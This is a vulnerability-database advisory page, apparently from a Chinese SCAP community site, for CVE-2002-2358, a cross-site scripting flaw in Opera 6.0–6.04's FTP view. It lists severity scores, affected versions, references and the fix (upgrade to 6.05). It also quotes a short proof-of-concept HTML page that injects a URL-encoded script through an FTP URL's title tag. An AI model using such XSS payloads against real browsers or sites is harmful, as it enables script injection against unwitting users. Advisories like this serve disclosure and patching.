CVE-2002-2358
CVSS4.3
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:33:01
NMCOE    

[原文]Cross-site scripting (XSS) vulnerability in the FTP view feature in Opera 6.0 and 6.01 through 6.04 allows remote attackers to inject arbitrary web script or HTML via the title tag of an FTP URL.


[CNNVD]Opera FTP视图跨站脚本漏洞(CNNVD-200212-518)

        Opera 6.0版本以及6.01版本到6.04版本的FTP视图功能存在跨站脚本(XSS)漏洞。远程攻击者可以借助FTP URL的标题标签注入任意web脚本或HTML。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-79 [在Web页面生成时对输入的转义处理不恰当(跨站脚本)]

- CPE (受影响的平台与产品)

cpe:/a:opera_software:opera_web_browser:6.0.1::win32
cpe:/a:opera_software:opera_web_browser:6.0.4::win32
cpe:/a:opera_software:opera_web_browser:6.0.3::win32
cpe:/a:opera_software:opera_web_browser:6.0::win32
cpe:/a:opera_software:opera_web_browser:6.0.1::linux
cpe:/a:opera_software:opera_web_browser:6.0
cpe:/a:opera_software:opera_web_browser:6.0.2::win32
cpe:/a:opera_software:opera_web_browser:6.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2358
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2358
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-518
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5401
(PATCH)  BID  5401
http://www.opera.com/windows/changelogs/605/?session=b2a9ea38c710788c23970ba2c9a34d47
(UNKNOWN)  MISC  http://www.opera.com/windows/changelogs/605/?session=b2a9ea38c710788c23970ba2c9a34d47
http://www.iss.net/security_center/static/9757.php
(UNKNOWN)  XF  multiple-ftp-view-xss(9757)
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0061.html
(UNKNOWN)  VULNWATCH  20020806 Opera FTP View Cross-Site Scripting Vulnerability

- 漏洞信息

Opera FTP视图跨站脚本漏洞
中危 跨站脚本
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        Opera 6.0版本以及6.01版本到6.04版本的FTP视图功能存在跨站脚本(XSS)漏洞。远程攻击者可以借助FTP URL的标题标签注入任意web脚本或HTML。

- 公告与补丁

        This vulnerability is eliminated in Opera Web Browser 6.0.5 Win32.
        Opera Software Opera Web Browser 6.0 win32
        
        Opera Software Opera Web Browser 6.0.1 win32
        
        Opera Software Opera Web Browser 6.0.2 win32
        
        Opera Software Opera Web Browser 6.0.3 win32
        
        Opera Software Opera Web Browser 6.0.4 win32
        

- 漏洞信息 (21681)

Opera 6.0.x FTP View Cross-Site Scripting Vulnerability (EDBID:21681)
windows remote
2002-08-06 Verified
0 Eiji James Yoshida
N/A [点击下载]
source: http://www.securityfocus.com/bid/5401/info

A cross-site scripting vulnerability in Opera has been reported. When viewing the contents of an FTP site as web content, the data within <title> tags is not sanitized. An attacker may embed javascript between open and closing <title> tags in a FTP URL. 

This vulnerability has been confirmed on Opera 6.03 and 6.04 for Windows 2000.

<html>
<head>
<META http-equiv="Refresh" content="5 ;
url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://[FTPserver]/");</script>
</body>
</html>

Example:
<html>
<head>
<META http-equiv="Refresh" content="5 ;
url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>		

- 漏洞信息

59529
Opera FTP View URL Title Tag XSS
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2002-08-06 Unknow
2002-08-06 Unknow

- 解决方案

Upgrade to version 6.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站